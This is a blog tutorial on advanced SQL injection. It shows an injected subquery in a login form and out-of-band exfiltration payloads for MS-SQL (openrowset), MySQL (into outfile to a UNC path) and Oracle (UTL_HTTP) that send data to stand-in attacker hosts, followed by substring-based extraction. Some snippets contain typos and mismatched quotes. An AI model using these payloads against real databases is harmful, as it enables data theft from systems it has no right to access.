Out-of-Band Channel Use Scenario
In many cases of SQL injection, the application does not return the results of any injected query in page, nor does it return any error messages generated by the database. Even if a SQL injection exists, it surely cannot be exploited to extract any data or perform any other action.
For example:
Suppose a vulnerable login form, where the username and password fields are vulnerable to SQL injection. There are many circumstances in which we may be able to inject an arbitrary query but not retrieve its results.
SELECT * FROM users WHERE username = 'kullanici" and password = 'sifre'
We can inject an entirely separate subquery using string concatenation to join its results to the item we control. (without login bypass)
Payload:
sifre' || (SELECT 1 FROM dual WHERE (SELECTusername FROM all_users WHERE username = 'admin') = 'admin')--
Query:
SELECT * FROM users WHERE username = 'kullanici" and password = 'sifre' || (SELECT 1 FROM dual WHERE (SELECTusername FROM all_users WHERE username = 'admin') = 'admin')
The login will fail but our injected query will have been executed. All we will receive back in the application’s response is the standard login error message. What we then need is a way to retrieve the results of our injected query.
Batch queries are useful, because they allow us to execute an entirely separate statement over which you have full control, using a different SQL verb and targeting a different table. However, the results of an injected query cannot be retrieved directly. One method for retrieving data that is often effective in this situation is to use an out-of-band channel.
One method for retrieving data that is often effective in this situation is to use an out-of-band channel. Having achieved the ability to execute arbitrary SQL statements within the database, it is often possible to leverage some of the database’s built-in functionality to create a network connection back to our own computer, over which we can transmit arbitrary data that we have gathered from database.
MS-SQL:
insert into openrowset(‘SQLOLEDB’,‘DRIVER={SQL Server};SERVER=attackersite.com,80;UID=as;PWD=letme’,‘select * from tablo’) values (@@version)The query causes the target database to open a connection to the attacker’s database and insert the version string of the target database into the table called tablo.
MYSQL:
select * into outfile ‘\\\\attackersite.com\\path\\output.txt’ from users;
ORACLE:
UTL_HTTP.request(‘attacker.site:80/’||(SELECT%20username%20FROM%20all_users%20WHERE%20ROWNUM%3d1))This URL causes UTL_HTTP to make a GET request for a URL containing the first username in the table all_users.
Retrieving Data as Numbers
SQL inj. may still exist within numeric data fields, where input is not include within single quotes. We can understand it via a numeric response from the application.
Oracle SUBSTR('foobar', 4, 2)Microsoft SUBSTRING('foobar', 4, 2)PostgreSQL SUBSTRING('foobar', 4, 2)MySQL SUBSTRING('foobar', 4, 2)
Each of the following expressions will return the string
ba.
OR
ASCII(SUBSTR(‘Ali’,1,1))it returns 65.
I wrote advanced SQLi in this article. I looked at the notes and wrote this article so I don't remember some references. I hope I wrote clearly. If I made a mistake, forgive me and say me :D Good days.
No comments:
Post a Comment